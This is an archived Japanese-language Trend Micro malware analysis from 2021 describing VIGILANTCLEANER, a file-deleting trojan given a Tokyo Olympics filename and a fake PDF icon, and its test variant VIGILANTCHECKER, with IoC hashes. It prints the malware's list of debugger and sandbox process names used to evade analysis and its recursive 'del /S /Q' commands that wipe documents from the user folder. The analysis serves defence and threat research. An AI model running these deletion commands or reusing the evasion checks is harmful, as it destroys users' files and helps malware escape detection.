{
	"id": "cda7b964-c5dd-40d8-9e12-d78661646038",
	"created_at": "2026-04-06T00:17:48.497662Z",
	"updated_at": "2026-04-10T03:20:16.145051Z",
	"deleted_at": null,
	"sha1_hash": "944c56bd1345963258118a9e6ebae8a7450fe052",
	"title": "「【至急】東京オリンピック開催に伴うサイバー攻撃等発生に関する被害報告について.exe」を解析",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 320456,
	"plain_text": "「【至急】東京オリンピック開催に伴うサイバー攻撃等発生に\r\n関する被害報告について.exe」を解析\r\nBy By: Trend Micro Research 2021/07/22 Read time: 3 分 (1472 words)\r\nPublished: 2021-07-22 · Archived: 2026-04-05 23:11:24 UTC\r\n7月21日、東京オリンピック関連と目されるファイル名「【至急】東京オリンピック開催に伴うサイバ\r\nー攻撃等発生に関する被害報告について.exe」が付けられたマルウェアについての情報が流れました。\r\n一部では注意喚起なども行われておりトレンドマイクロにも問い合わせが入っておりますので、現時\r\n点までに確認できた内容を本ブログ記事でお知らせします。本件について確認できた検体は2種あり、\r\nトレンドマイクロでは「VIGILANTCLEANER」および「VIGILANTCHECKER」の検出名で対応してい\r\nます。つけられたファイル名やPDFファイルのアイコン偽装を行っている点から考えると、東京オリン\r\nピック開会直前のタイミングで関連組織を狙った標的型メール攻撃などの目的で作成された様子がう\r\nかがえますが、現在のところ問題のファイルの拡散経路などの詳細は確認できておらず一般に拡散し\r\nている形跡もないことから、訓練用サンプルや単なるいたずら目的等の可能性もあるものと言えま\r\nす。\r\nFile name sha1 type\r\ncompiled\r\ntime\r\n(UTC)\r\nTrend Micro Detection name\r\n【至急】東京オ\r\nリンピック開催\r\nに伴うサイバー\r\n攻撃等発生に関\r\nする被害報告に\r\nついて.exe\r\n54a8b718fda1ea749df17\r\n271d3f897c947004483\r\nUPX\r\nEXE\r\n2021-07-\r\n20\r\n05:52:05\r\nTrojan.Win32.\r\nVIGILANTCLEANER.ZKIG\r\nN/A (↑をアンパ\r\nックしたもの)\r\n7d0a74e561b2d05f0798\r\ne032677b415b4b760b30\r\nWIN32\r\nEXE\r\n2021-07-\r\n20\r\n05:52:05\r\nTrojan.Win32.\r\nVIGILANTCLEANER.ZKIG\r\nzzz.exe\r\nef9a140dc79bf2cdaf2c3\r\nbd4d9928f57af60702f\r\nUPX\r\nEXE\r\n2021-07-\r\n17\r\n15:37:07\r\nPUA.Win32.\r\nVIGILANTCHECKER.ZLIG\r\nN/A (↑をアンパ\r\nックしたもの)\r\nff3111e490ea9a872a7ca\r\n9c6820173459266d2bb\r\nWIN32\r\nEXE\r\n2021-07-\r\n17\r\n15:37:07\r\nPUA.Win32.\r\nVIGILANTCHECKER.ZLIG\r\n表：本件に関するIoC情報\r\nhttps://blog.trendmicro.co.jp/archives/28319\r\nPage 1 of 5\n\n■「VIGILANTCLEANER」と「VIGILANTCHECKER」\r\n東京オリンピック関連のファイル名が付けられた「VIGILANTCLEANER」は仮想環境判定などの耐解\r\n析機能を持つと共に、ドキュメントファイルなどの削除を行うもので、ある種の破壊プログラムに大\r\n別されるマルウェアです。最終的に痕跡消去として自身を削除する活動も行います。\r\n「VIGILANTCLEANER」の作成日時は7月20日となっており、直前に作成されたものであるとわかりま\r\nす。一方の「VIGILANTCHECKER」の内容は「VIGILANTCLEANER」からファイル削除の活動だけを\r\n抜いたような形になっています。作成日時的には「VIGILANTCHECKER」の方が先に作られており、\r\n「VIGILANTCLEANER」のためのテスト版的存在である可能性もあります。\r\n図1：PDF文書ファイルへのアイコン偽装が行われているVIGILANTCLEANER\r\n耐解析機能としては、Sleep APIバイパスのチェック、自身に対するソフトウェアブレークポイントや\r\nフックの存在判定、特定のプロセスやウインドウの存在判定、プロセスモニターやデバッガの存在判\r\n定、仮想環境の判定、などの条件から解析環境を判断し、自身の活動を終了させるものとなっていま\r\nす。特定方法としては以下のプロセス名をチェックしており、幅広く解析ツールを網羅して解析環境\r\nかどうかを判定しようとしていることがわかります。\r\nWireshark.exe\r\napateDNS.exe\r\nAutoruns.exe\r\nbindiff.exe\r\nidaq.exe\r\nidaq64.exe\r\nProcmon.exe\r\nx64dbg.exe\r\nx32dbg.exe\r\nollydbg.exe\r\nImmunityDebugger.exe\r\nVBoxTray.exe\r\nVBoxService.exe\r\nmsedge.exe\r\nVirtualBox.exe\r\njavaw.exe\r\nx96dbg.exe\r\nidaw.exe\r\nwindbg.exe\r\ndnSpy.exe\r\nHxD.exe\r\nScylla_x64.exe\r\nScylla_x86.exe\r\nregmon.exe\r\nhttps://blog.trendmicro.co.jp/archives/28319\r\nPage 2 of 5\n\nprocexp.exe\r\nprocexp64.exe\r\nTcpview.exe\r\nsmsniff.exe\r\nFakeNet.exe\r\nnetmon.exe\r\nPEiD.exe\r\nLordPE.exe\r\nPE-bear.exe\r\nPPEE.exe\r\ndie.exe\r\ndiel.exe\r\npexplorer.exe\r\ndepends.exe\r\nResourceHacker.exe\r\nFileAlyzer2.exe\r\nprocesshacker.exe\r\nRegshot-x64-Unicode.exe\r\n解析環境ではないと判定した場合は、破壊活動を行います。以下のコマンドにより、実行者アカウン\r\nトのユーザフォルダ（c:\\users\\%username%\\）およびそのサブフォルダにある文書ファイルなどを削除\r\nします。\r\ndel /S /Q *.doc c:\\users\\%username%\\ \u003e  nul\r\ndel /S /Q *.docm c:\\users\\%username%\\ \u003e nul\r\ndel /S /Q *.docx c:\\users\\%username%\\ \u003e nul\r\ndel /S /Q *.dot c:\\users\\%username%\\ \u003e  nul\r\ndel /S /Q *.dotm c:\\users\\%username%\\ \u003e nul\r\ndel /S /Q *.dotx c:\\users\\%username%\\ \u003e nul\r\ndel /S /Q *.pdf c:\\users\\%username%\\ \u003e  nul\r\ndel /S /Q *.csv c:\\users\\%username%\\ \u003e  nul\r\ndel /S /Q *.xls c:\\users\\%username%\\ \u003e  nul\r\ndel /S /Q *.xlsx c:\\users\\%username%\\ \u003e nul\r\ndel /S /Q *.xlsm c:\\users\\%username%\\ \u003e nul\r\ndel /S /Q *.ppt c:\\users\\%username%\\ \u003e  nul\r\ndel /S /Q *.pptx c:\\users\\%username%\\ \u003e nul\r\ndel /S /Q *.pptm c:\\users\\%username%\\ \u003e nul\r\ndel /S /Q *.jtdc c:\\users\\%username%\\ \u003e nul\r\ndel /S /Q *.jttc c:\\users\\%username%\\ \u003e nul\r\ndel /S /Q *.jtd c:\\users\\%username%\\ \u003e  nul\r\ndel /S /Q *.jtt c:\\users\\%username%\\ \u003e  nul\r\ndel /S /Q *.txt c:\\users\\%username%\\ \u003e  nul\r\nhttps://blog.trendmicro.co.jp/archives/28319\r\nPage 3 of 5\n\ndel /S /Q *.exe c:\\users\\%username%\\ \u003e  nul\r\ndel /S /Q *.log c:\\users\\%username%\\ \u003e  nul\r\nMicrosoft OfficeやPDFなどの文書ファイルと同時に「.jtd」など一太郎の文書ファイルも削除対象に含ま\r\nれていることから、このマルウェアが日本の組織を狙ったものであるとの推測が成り立ちます。\r\nまた、文書ファイルなどの削除と同時に、curlコマンドを使用してアダルト動画サイトへのアクセスも\r\n行います。この活動の意図は不明ですが、事後調査の混乱を狙ったものと考えられます。\r\nそして最後に自身のファイルを削除します。これは自身の痕跡を消去し、調査を困難化させるための\r\n活動と言えます。\r\n■類似プログラムに関する考察\r\n調査を行った結果、「VIGILANTCHECKER」と類似したコードがGitHub上のリポジトリに公開されて\r\nいることを確認しました。このリポジトリは、教育を目的としたアンチデバッグ用プログラムのソー\r\nスコードを複数ホストしていました。\r\n図2：bit反転させた文字列群\r\n図3：文字列デコード処理部分（上: GitHub上のコード、下: VIGILANTCHECKERのコード）\r\nこのリポジトリ上のコードは、教育の範囲内に収まるものであり、「VIGILANTCLEANER」が持つよ\r\nうなファイル削除機能や、アダルト動画サイトへのアクセス試行を行うコードは含まれておらず、マ\r\nルウェアと判定できるものではありませんでした。そのため、今回発見された２種類のプログラムに\r\nついては、異なる人物が不正なコードを追加して作成した可能性が考えられます。近年「Living off the\r\nLand（環境寄生）」と呼ばれる一般に出回っている正規プログラムを悪用する攻撃手法が常套化する\r\n中で、攻撃者により正規目的のオープンソースコードが悪用されるケースも目立ってきており、これ\r\nもそのような例の1つであるものと推測できます。\r\n■まとめ\r\n「VIGILANTCLEANER」のようなマルウェアの存在は東京オリンピックへの関心に便乗した攻撃の存\r\n在を示唆したものと言えます。破壊型のマルウェアである点、開会直前のタイミングという2点から\r\nは、前回平昌冬季五輪で発生した「Olympic Destroyer」の事例を思い起こさせるものがあり、類似の事\r\n例には今後も注意が必要です。ただし現在のところ、攻撃の主体や目的はおろか、実際に配布があっ\r\nたかどうかなどの詳細もわかっておらず、本当に「脅威」とすべき存在であるかどうかには大きな疑\r\n問符がつく状況とも言えます。また昨今発生している攻撃者によるオープンソースコードの悪用とい\r\nう傾向も垣間見られる事例となっていました。被害の発生を防ぐという観点からトレンドマイクロで\r\nはこのような小さな兆候も含めて注視し、必要な対応を行ってまいります。\r\nhttps://blog.trendmicro.co.jp/archives/28319\r\nPage 4 of 5\n\nSource: https://blog.trendmicro.co.jp/archives/28319\r\nhttps://blog.trendmicro.co.jp/archives/28319\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "JA",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.trendmicro.co.jp/archives/28319"
	],
	"report_names": [
		"28319"
	],
	"threat_actors": [],
	"ts_created_at": 1775434668,
	"ts_updated_at": 1775791216,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/944c56bd1345963258118a9e6ebae8a7450fe052.pdf",
		"text": "https://archive.orkl.eu/944c56bd1345963258118a9e6ebae8a7450fe052.txt",
		"img": "https://archive.orkl.eu/944c56bd1345963258118a9e6ebae8a7450fe052.jpg"
	}
}